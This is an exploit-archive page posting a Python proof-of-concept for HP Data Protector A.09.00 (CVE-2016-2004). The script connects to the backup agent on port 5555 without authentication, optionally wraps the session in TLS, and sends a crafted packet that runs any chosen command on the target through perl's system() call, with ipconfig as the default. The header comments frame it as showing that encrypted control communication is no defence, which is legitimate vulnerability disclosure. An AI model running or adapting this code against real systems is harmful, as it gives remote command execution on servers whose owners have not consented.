HP Data Protector A.09.00 Command Execution

HP Data Protector A.09.00 Command Execution: Posted May 26, 2016; Authored by Ian Lovering; HP Data Protector version A.09.00 suffers from an arbitrary command execution vulnerability.; tags | exploit, arbitrary; advisories | CVE-2016-2004; SHA-256 | d3f1ffffb6eef9ed7cc7377227cb355ba26d3c2faa89427fe68466377916027e; Download | Favorite | View

HP Data Protector A.09.00 Command Execution

#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
 
#   This proof of concept demonstrates that enabling encrypted control communication on
#   Data Protector agents does not provide any additional security.
#   As is provides no authentication it is not a viable workaround to prevent the
#   exploitation of well known Data Protector issues such as cve-2014-2623
#
#   This exploit establishes and unauthenticated encrypted communication channel to 
#   a Data Protector Agent and uses a well known unencrypted Data Protector vulnerability
#   to run arbitrary commands on the target.
 
#   Tested on Kali Linux 2 with python 2.7.9
#   Tested against Data Protector A.09.00 (Internal Build version 88) with encrypted control
#   communication enabled.
#   All other Data Protector settings are default.
#   Tested against Data Protector agent running on Windows 2008 R2
#   Also tested against Data Protector A.07
#
#   encrypted-dataprotector.py -e <ipaddress>
#
#   By default runs ipconfig on the target. 
#   Can take a little while to return. Have patience ;)
#
#   CVE-2016-2004
 
import socket
import ssl
import time
import struct
import argparse
 
 
parser = argparse.ArgumentParser(prog='test-encrypt.py')
parser.add_argument('-e', '--encrypt', dest='encrypt', action='store_true')
parser.add_argument('-p', '--port', type=int)
parser.add_argument('-c', '--command')
parser.add_argument('ipaddress')
parser.set_defaults(encrypt=False,port=5555)
args = parser.parse_args()
 
HOST = args.ipaddress
PORT = args.port
 
command = 'ipconfig'
 
if args.command:
    command = args.command
 
# initialise data
initdata = ("\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00"
        "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00"
        "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00"
        "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00"
        "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00")
 
OFFSET = 46
command = command.replace("\\", "\\\\")
command = command.replace("\'", "\\\'")
command_length = struct.pack(">I",OFFSET + len(command))
payload = command_length         +\
    "\x32\x00\x01\x01\x01\x01\x01\x01" +\
    "\x00\x01\x00\x01\x00\x01\x00\x01" +\
    "\x01\x00\x20\x32\x38\x00\x5c\x70" +\
    "\x65\x72\x6c\x2e\x65\x78\x65\x00" +\
    "\x20\x2d\x65\x73\x79\x73\x74\x65" +\
    "\x6d('%s')\x00" % command
 
def get_data(sock):
    response = ''
    recv_len =1
     
    while recv_len:
        data = sock.recv(4096)
        recv_len = len(data)
        response += data
        if recv_len < 4096:
            break
     
    return response
 
def get_dp_response(sock):
 
    print "===== Response ====="
    print
 
    while True:
 
        # Get information about response
        packed_length = sock.recv(4)
        if not packed_length: 
            break
        n = struct.unpack(">I", packed_length)[0]
        tmpresponse = sock.recv(n)
        tmpresponse = tmpresponse.replace("\n", "")
        tmpresponse = tmpresponse.replace("\x00", "")
        tmpresponse = tmpresponse.replace("\xff\xfe\x39\x20", "")
        if tmpresponse.upper().find("*RETVAL*") != -1:
            break
        else:
            print tmpresponse
 
    print
    print "===== End ====="
    print
 
 
client = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
 
if args.encrypt:
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    context.set_ciphers('ALL')
 
try:
    client.connect(( HOST, PORT ))
    print "Connected"
 
    if args.encrypt:
        # send data protector init string
        client.send(initdata)
        response = get_data(client)
 
        # setup tls
        client = context.wrap_socket(client)
        print "Encryption Enabled"
     
    # send payload
    client.send(payload)
    print "Sent Payload"
    print ""
    print "===== Command ====="
    print
    print command
    print
    get_dp_response(client)
 
    client.close()
 
except Exception as e:
    print '[*] Exception. Exiting.'
    print e
    client.close()

Top Authors In Last 30 Days

Red Hat 183 files
Ubuntu 59 files
Debian 20 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Google Security Research 6 files
E1.Coders 4 files
Ersin Erenler 4 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,007)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,166)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,459)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,428)
UNIX (9,390)
UnixWare (187)
Windows (6,647)
Other

HP Data Protector A.09.00 Command Execution

HP Data Protector A.09.00 Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HP Data Protector A.09.00 Command Execution

Share This

HP Data Protector A.09.00 Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems